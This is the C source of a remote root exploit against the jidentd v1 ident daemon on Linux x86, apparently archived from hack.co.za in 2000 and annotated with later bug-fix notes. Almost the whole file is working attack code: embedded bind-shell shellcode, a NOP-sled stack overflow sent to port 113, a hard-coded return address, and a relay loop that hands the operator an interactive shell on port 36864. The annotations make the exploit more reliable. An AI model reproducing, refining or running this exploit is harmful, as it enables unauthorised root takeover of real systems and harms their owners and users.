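/*
 * Copyright (c) anathema
 * All rights reserved.
 *
 * jidentd v1 remote root exploit (linux x86).
 * THIS IS UNPUBLISHED PRIVATE SOURCE CODE -- DO NOT DISTRIBUTE.
 *
 * compile : gcc -o own own-jidentd.c
 * usage   : ./own hostname
 * or      : ./own hostname offset
 *
 * When you get the `0wned` prompt, you are in an interactive shell.
 * Type `id` or `whoami` and see that you are r00t ;)
 *
 * Review notes on this archived (hack.co.za, 2000) listing:
 *  - The original #include names were stripped by whatever extracted the
 *    page; the list below is reconstructed from the identifiers the code
 *    actually uses.
 *  - `offset` was only assigned when a third argument was present and was
 *    otherwise read uninitialised; it now defaults to 0 and is parsed with
 *    strtol() so garbage is rejected instead of silently becoming 0.
 *  - The interactive loop passed a constant 255 as select()'s nfds, never
 *    noticed recv()/read() returning 0 (it spun forever), and could run
 *    strlen() past a completely filled 4096-byte buffer.  Fixed.
 *  - The saved-EIP overwrite was done through a `u_long *` cast, which is
 *    4 bytes on the 32-bit hosts this was written for but 8 on x86-64
 *    builds; it is now written as exactly 4 little-endian bytes.
 *  - RETPOS/ADDR are hard-coded for one build of jidentd v1.  Nothing here
 *    verifies the target version or that the daemon survived; a wrong
 *    offset just crashes the daemon, and the `0wned` banner only means the
 *    TCP connect to BD_PORT succeeded.
 */

#include <errno.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/*
 * Payload placed at the end of the NOP sled.  Tracing the bytes: a
 * socketcall() socket/bind/listen/accept sequence on port 0x9000 (BD_PORT),
 * three dup2() calls, execve("/bin/sh"), exit() -- i.e. a bind shell, which
 * is what shellz() connects to.  Treat it as opaque data; it must stay free
 * of NUL bytes because the buffer is sent with strlen().
 */
char c0de[] =
    "\xeb\x49\x5e\x29\xc0\x29\xdb\x40\x89\x46\x04\x40\x89\x06\xb0\x06\x89\x46"
    "\x08\xb0\x66\x43\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x90"
    "\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x29\xc0\x89\x46\x10\xb0\x10\x89"
    "\x46\x08\xb0\x66\x43\xcd\x80\x29\xc0\x40\x89\x46\x04\xb3\x04\xb0\x66\xcd"
    "\x80\xeb\x02\xeb\x4c\x29\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\x43\xcd\x80"
    "\x88\xc3\x29\xc9\xb0\x3f\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80"
    "\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46\x04\x29"
    "\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
    "\x56\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8\x64\xff\xff\xff";

#define AUTH_PORT 113        /* ident/auth, the service being attacked */
#define BD_PORT   36864      /* 0x9000: port the shellcode listens on */
#define RETPOS    2090       /* byte offset of the saved return address in the overflowed buffer */
#define ADDR      0xbffffa94 /* guessed stack address inside the NOP sled (32-bit Linux) */

/* The shellcode is copied to end exactly at RETPOS, so it must fit below it. */
_Static_assert(sizeof c0de - 1 < RETPOS, "shellcode does not fit below RETPOS");

/*
 * Resolve a dotted-quad or host name to an IPv4 address in network byte
 * order.  Returns (unsigned long)-1 on failure.  Note that inet_addr()
 * reports failure as INADDR_NONE (255.255.255.255), so that one address
 * cannot be targeted by this function -- same limitation as the original.
 */
unsigned long resolve_host(const char *host_name)
{
    struct in_addr addr;
    struct hostent *he;

    addr.s_addr = inet_addr(host_name);
    if (addr.s_addr == INADDR_NONE) {
        he = gethostbyname(host_name);
        /* Only accept a 4-byte AF_INET answer: the original memcpy'd
         * h_length bytes into the 4-byte s_addr unconditionally. */
        if (!he || he->h_addrtype != AF_INET ||
            he->h_length != (int)sizeof addr.s_addr || !he->h_addr_list[0])
            return (unsigned long)-1;
        memcpy(&addr.s_addr, he->h_addr_list[0], sizeof addr.s_addr);
    }
    return addr.s_addr;
}

/*
 * Connect to the bind shell on dst_ip:BD_PORT and relay stdin/stdout to it
 * until either side closes.  Never returns: exits 0 on an orderly close and
 * -1 (255) on an error.
 */
void shellz(unsigned long dst_ip)
{
    struct sockaddr_in sin;
    char sock_buf[4096];
    fd_set fds;
    int sock;
    ssize_t n;

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == -1) {
        perror("socket allocation");
        exit(-1);
    }

    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(BD_PORT);
    sin.sin_addr.s_addr = (in_addr_t)dst_ip;

    if (connect(sock, (struct sockaddr *)&sin, sizeof sin) == -1) {
        perror("connect");
        close(sock);
        exit(-1);
    }

    /* Only proves the TCP connect succeeded, not that a shell is attached. */
    fprintf(stderr, "0wned\n");

    for (;;) {
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(sock, &fds);

        /* nfds is highest fd + 1; the original hard-coded 255. */
        if (select(sock + 1, &fds, NULL, NULL, NULL) == -1) {
            if (errno == EINTR)
                continue;
            perror("select");
            close(sock);
            exit(-1);
        }

        if (FD_ISSET(sock, &fds)) {
            n = recv(sock, sock_buf, sizeof sock_buf, 0);
            /* 0 means the peer closed; the original only caught -1 and spun. */
            if (n <= 0) {
                fprintf(stderr, "Connection closed by remote host.\n");
                close(sock);
                exit(0);
            }
            /* Remote output is untrusted bytes: write them by length rather
             * than through "%s", which would stop at an embedded NUL. */
            fwrite(sock_buf, 1, (size_t)n, stderr);
        }

        if (FD_ISSET(0, &fds)) {
            n = read(0, sock_buf, sizeof sock_buf);
            if (n <= 0) {          /* EOF or error on our own stdin */
                close(sock);
                exit(0);
            }
            if (write(sock, sock_buf, (size_t)n) != n) {
                perror("write");
                close(sock);
                exit(-1);
            }
        }
    }
    /* NOTREACHED */
}

/*
 * printf-style send to a socket.  The formatted text is truncated at 4095
 * bytes; the only caller sends RETPOS + 7 bytes, well under that.  A short
 * or failed write is reported but, as before, not treated as fatal.
 */
void snd_res(int sock, const char *fmt, ...)
{
    char tmp[4096];
    va_list ap;
    size_t len;

    va_start(ap, fmt);
    vsnprintf(tmp, sizeof tmp, fmt, ap);
    va_end(ap);

    len = strlen(tmp);
    if (write(sock, tmp, len) != (ssize_t)len)
        perror("write to ident daemon");
}

/* Print usage to stderr and exit with -1 (255). */
void usage(const char *nomenclature)
{
    fprintf(stderr, "No.\nusage:\t%s dst_ip [offset]\n", nomenclature);
    exit(-1);
}

int main(int argc, char **argv)
{
    struct sockaddr_in sin;
    struct in_addr dst_addr;
    unsigned long dst_ip, addr;
    unsigned char buf[4096];
    long offset = 0;                     /* was uninitialised when argc == 2 */
    int sock;
    const size_t retpos = RETPOS;
    const size_t codelen = sizeof c0de - 1;

    if (argc != 2 && argc != 3) {
        usage(argv[0]);
        /* NOTREACHED */
    }

    if (argc == 3) {
        char *end = NULL;
        errno = 0;
        offset = strtol(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || errno == ERANGE)
            usage(argv[0]);
    }

    dst_ip = resolve_host(argv[1]);
    if (dst_ip == (unsigned long)-1) {
        fprintf(stderr, "What kind of address is this: `%s`?\n", argv[1]);
        exit(-1);
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == -1) {
        perror("socket allocation");
        exit(-1);
    }

    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(AUTH_PORT);
    sin.sin_addr.s_addr = (in_addr_t)dst_ip;

    if (connect(sock, (struct sockaddr *)&sin, sizeof sin) == -1) {
        perror("connecting to ident daemon");
        close(sock);
        exit(-1);
    }

    addr = ADDR + (unsigned long)offset;  /* offset may be negative */
    dst_addr.s_addr = (in_addr_t)dst_ip;

    fprintf(stderr,
            "The eyes of stanley pain:\n"
            "  To: %s.%d\n"
            " Ret: %zu\n"
            "Addr: 0x%lx\n",
            inet_ntoa(dst_addr), AUTH_PORT, retpos, addr);

    /*
     * Layout of the request line: NOP sled, shellcode ending at RETPOS,
     * then the 4-byte return address, one more sled byte, and a NUL so that
     * snd_res()'s strlen() stops there (RETPOS + 5 bytes total).
     */
    memset(buf, 0x90, sizeof buf);
    memcpy(buf + retpos - codelen, c0de, codelen);

    /* Target is x86: write the address as 4 little-endian bytes regardless
     * of the size of unsigned long on the build host. */
    buf[retpos + 0] = (unsigned char)(addr & 0xff);
    buf[retpos + 1] = (unsigned char)((addr >> 8) & 0xff);
    buf[retpos + 2] = (unsigned char)((addr >> 16) & 0xff);
    buf[retpos + 3] = (unsigned char)((addr >> 24) & 0xff);
    buf[retpos + 5] = 0;

    snd_res(sock, "%s\r\n", (char *)buf);

    /* Give the daemon time to return into the sled and start listening. */
    sleep(4);

    shellz(dst_ip);
    /* NOTREACHED */
    return 0;
}

/* www.hack.co.za [2000]*/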